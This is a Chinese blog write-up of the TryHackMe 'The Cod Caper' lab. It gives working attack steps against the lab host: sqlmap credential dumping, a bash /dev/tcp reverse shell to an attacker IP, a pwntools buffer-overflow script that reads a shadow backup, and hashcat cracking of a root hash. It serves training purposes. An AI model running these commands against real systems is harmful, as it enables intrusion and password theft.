TryHackMe学习笔记-The Cod Caper

最新推荐文章于 2024-06-12 17:28:34 发布
最新推荐文章于 2024-06-12 17:28:34 发布
阅读量1.3k 收藏
点赞数
分类专栏: # PWN 文章标签: 网络安全 渗透测试 pwn gdb 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/galaxy3000/article/details/122006584
版权

文章目录

概述

继续TryHackMe的学习记录,本次靶机为The Cod Caper,内容为从Web漏洞利用到缓冲区溢出提权。

在这里插入图片描述

启动靶机后,靶机IP地址为10.10.162.177

端口扫描

nmap端口扫描,发现开了2个端口

nmap -Pn --open 10.10.162.177

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

对80端口进一步探测

nmap -Pn -p80 --open -sC -sV 10.10.162.177

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

对22端口进一步探测

nmap -Pn -p22 --open -sC -sV 10.10.162.177

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 6d:2c:40:1b:6c:15:7c:fc:bf:9b:55:22:61:2a:56:fc (RSA)
|   256 ff:89:32:98:f4:77:9c:09:39:f5:af:4a:4f:08:d6:f5 (ECDSA)
|_  256 89:92:63:e7:1d:2b:3a:af:6c:f9:39:56:5b:55:7e:f9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80端口漏洞利用

Web页面访问

直接访问http://10.10.162.177,是Apache默认页面

目录扫描

sudo gobuster dir -u http://10.10.162.177 -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -x .php,.txt,.html

在这里插入图片描述

SQL注入

访问http://10.10.162.177/administrator.php

在这里插入图片描述
直接通过sqlmap测试注入,这里注意,无法使用burp记录post的内容,因此不能使用-r参数,改为使用--forms参数

 sqlmap --random-agent -u http://10.10.162.177/administrator.php --forms --tamper space2comment

在这里插入图片描述

进一步利用sqlmap注入,最终得到web应用的账号密码

sqlmap --random-agent -u http://10.10.162.177/administrator.php --forms --tamper space2comment -D users -T users -C "username,password" --dump

Database: users
Table: users
[1 entry]
+----------+------------+
| username | password   |
+----------+------------+
| pingudad | secretpass |
+----------+------------+

命令执行 - 初始立足点

利用账号密码登录系统,得到一个输入框可以执行命令,这里在命令框执行bash -c "bash -i >& /dev/tcp/10.11.13.149/4444 0>&1",在攻击机10.11.13.149得到反弹shell,得到初始立足点,此时的用户为www-data

敏感文件查找

根据靶机提示,需要使用find命令查找敏感文件
···
$ find / -user www-data -type f 2>/dev/null
···

除了web应用文件外,找到一个/var/hidden/pass文件可以以www-data打开得到密码pinguapingu
在这里插入图片描述

LinEnum

根据靶机提示,需要使用LinEnum查找可提权的点,利用已有账号pingu:pinguapingu,通过scp命令向靶机传送文件LinEnum.sh,放在/tmp目录下,运行枚举

chmod +x LinEnum.sh
./LinEnum.sh

发现文件/opt/secret/root

提权

根据靶机提示,已经有此文件的源代码

#include "unistd.h"
#include "stdio.h"
#include "stdlib.h"
void shell(){
setuid(1000);
setgid(1000);
system("cat /var/backups/shadow.bak");
}

void get_input(){
char buffer[32];
scanf("%s",buffer);
}

int main(){
get_input();
}

首先查看/opt/secret/root的保护措施,可以看到没开启任何保护措施

在这里插入图片描述

分析源代码,可以看到main()调用get_input()函数,其有一个buffer缓冲,并用scanf()接收输入,不进行边界检查,能够导致缓冲区溢出,是我们控制程序控制流(通过控制寄存器EIP实现),进行执行shell(),读取cat /var/backups/shadow.bak

gdb

要进行缓冲区溢出,需要首先确认偏移,使其覆盖缓冲区与ebp直到eip,这里使用gdb实现,使用了pwndbg插件

首先生成填充字符

cyclic 100

输入上述字符串得到异常,提示Invalid address 0x6161616c

通过命令 cyclic -l 0x6161616c确认偏移为44

在这里插入图片描述

利用pwntools溢出

p = process('./root')
elf = ELF('./root', checksec=False)

offset = 44
shell_addr = elf.symbols['shell']
payload = 'A' * offset + p32(shell_addr)
p.sendline(payload)
p.interactive()

在这里插入图片描述
得到root的hash值$6$rFK4s/vE$zkh2/RBiRZ746OW3/Q/zqTRVfrfYJfFjFc2/q.oYtoF1KglS3YWoExtT3cvA3ml9UtDS8PFzCk902AsWx00Ck.

hashcat破解hash

使用hashcat破解

sudo hashcat -m 1800 password.txt rockyou.txt  --force
sudo hashcat -m 1800  password.txt ~/tmp/rockyou.txt  --show
$6$rFK4s/vE$zkh2/RBiRZ746OW3/Q/zqTRVfrfYJfFjFc2/q.oYtoF1KglS3YWoExtT3cvA3ml9UtDS8PFzCk902AsWx00Ck.:love2fish

得到密码为love2fish,得到完全的靶机控制权限

galaxy3000
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Tryhackme - hackpark (考点:hydra & BlogEngine.NET 3.3.6 & autologon登录信息提权 & abnormal service提权)
冬萍子癸水
05-26 1175
1 扫描 主要就是80进web搜集信息 C:\root> nmap -A 10.10.16.216 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-26 01:55 EDT Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn Nmap done: 1 IP address (0 hosts up) scanned in 3.64 secon
The-Urinal-Caper
03-14
"The-Urinal-Caper-master"这个文件名暗示了项目使用了Git进行版本控制。Git是一种分布式版本控制系统,用于跟踪对文件和目录的更改,便于团队协作和项目管理。`master`分支通常被视为主要的开发分支,存放稳定代码...
tryhackme
03-08
tryhackme
TryHackMe - Kenobi,全球最火的程序员学习路线
m0_60721860的博客
04-06 618
最近很多小伙伴找我要Linux学习资料,于是我翻箱倒柜,整理了一些优质资源,涵盖视频、电子书、PPT等共享给大家!
10个练习Web渗透测试的最佳网站
最新发布
2302_76672693的博客
06-12 808
10个练习Web渗透测试的最佳网站
TryHackMe学习笔记-Reversing ELF-1
网安星空
12-22 267
pwn学习,对elf进行逆向,使用了IDA静态分析与动态分析技术和gdb对目标进行分析
Game Caper-开源
07-05
"Game Caper"是一款使用Java编程语言开发的开源游戏项目,源自一个大学的课程作业,其灵感来源于经典的"B-0"游戏。...无论是从技术学习还是游戏娱乐的角度,"Game Caper"都是一个值得探索的宝贵资源。
caper:极简游戏框架
05-28
跳跃 使用极简游戏框架。 目前拥有以下系统: ...use caper :: game :: * ;use caper :: imgui :: Ui;use caper :: input :: Key;use caper :: mesh :: gen_cube;use caper :: types :: {DefaultTag, RenderItemBuilde
Python库 | caper-1.3.1-py3-none-any.whl
04-20
资源分类:Python库 所属语言:Python 使用前提:需要解压 资源全名:caper-1.3.1-py3-none-any.whl 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
CAPER
10-24
【标题】CAPER 在IT领域,"CAPER"这个词可能并不常见,但它可能是某种特定项目、工具或概念的缩写。由于提供的信息有限,我们无法确定它的确切含义。通常,这样的首字母缩写词可能代表某个技术术语、软件开发方法、...
tryhackme-writeups:我对TryHackMe机器的笔记
03-08
TryHackMe-写信 列出写作
Rootme-WriteUp:来自tryhackme的RootME文章
04-13
RootME-tryhackme 通过0xRar 扫描 nmap -T4 -A -p- MACHINE_IP Nmap scan report for MACHINE_IP Host is up (0.15s latency). Not shown: 65464 closed ports, 69 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA) | 256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49
Tryhackme-Writeups:到目前为止,我的每个tryhackme房间的文字记录已完成
03-20
Tryhackme-Writeups 到目前为止,我的每个tryhackme房间的文字记录已完成 关于我:我自己Kartikey Jain,我是一名初学者Ethical Hacker,只是好奇事情如何破裂,我认为这现在成为我的激情,很高兴学习新概念。
tryhackme--Blog
qq_45414878的博客
11-15 366
tryhackme–Tony the Tiger
tryhackme--Wgel CTF
qq_45414878的博客
10-23 406
tryhackme--Wgel CTFnmapid_rsa信息泄漏wget的sudo提权 nmap 简单扫描靶机的服务 nmap -T4 -sS -sV 10.10.247.24 深度扫描也没没有什么可以直接利用的漏洞 目标机器为linux主机,并且目标主机开放了两个端口:22、80。 端口 服务 22 ssh 80 http id_rsa信息泄漏 访问80端口,发现为apache的默认页面,查看页面源代码,发现一句很有趣的话,其中 Jessie 可能为用户名 用dirsear
Tryhackme-Wonderland
个人博客
09-14 417
Wonderland 文章目录WonderlandWonderlandTask1 Capture the flagsPerlCapabilitiesLooking GlassTask1 Looking Glass Wonderland Task1 Capture the flags nmap扫描发现开启22端口和80端口 80端口进行目录扫描,未发现突破口 下载/img/white_rabbit_1.jpg,使用steghide提取隐藏文件,得到提示follow the r a b b i t,尝试访
Tryhackme-Kenobi靶机
MSB_WLAQ的博客
10-06 514
前言 一个国外的渗透学习网站,补基础知识点还是不错的,适合新人学习网络安全(因为学习项目里有提示)。 知识点 可直接开启web的虚拟机[非会员每天只有一个小时],也可以使用VPN连接(个人建议还是用VPN爽点,毕竟自己的机子工具啥的用起来方便)。 samba Samba是适用于和Unix的标准Windows互操作性程序套件。它允许最终用户访问和使用公司内联网或互联网上的文件、打印机和其他常见共享资源。它通常被称为网络文件系统。 Samba基于服务器消息块 (SMB) 的通用客户端/服.
TryHackMe - Archangel靶场
z4yn:)的博客
02-22 279
Archangel Boot2root, Web exploitation, Privilege escalation, LFI 0x01 信息收集 常规端口扫一波,发现只有22和80端口开放 先从80端口入手,常规的扫目录没有发现有价值的东西 在源代码里发现一个可以的域名 网站找不到突破口,试着修改本地的hosts文件指向改域名,访问后获得第一个flag 在用gobuster扫描网站目录,得到test.php和robots.txt robots....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值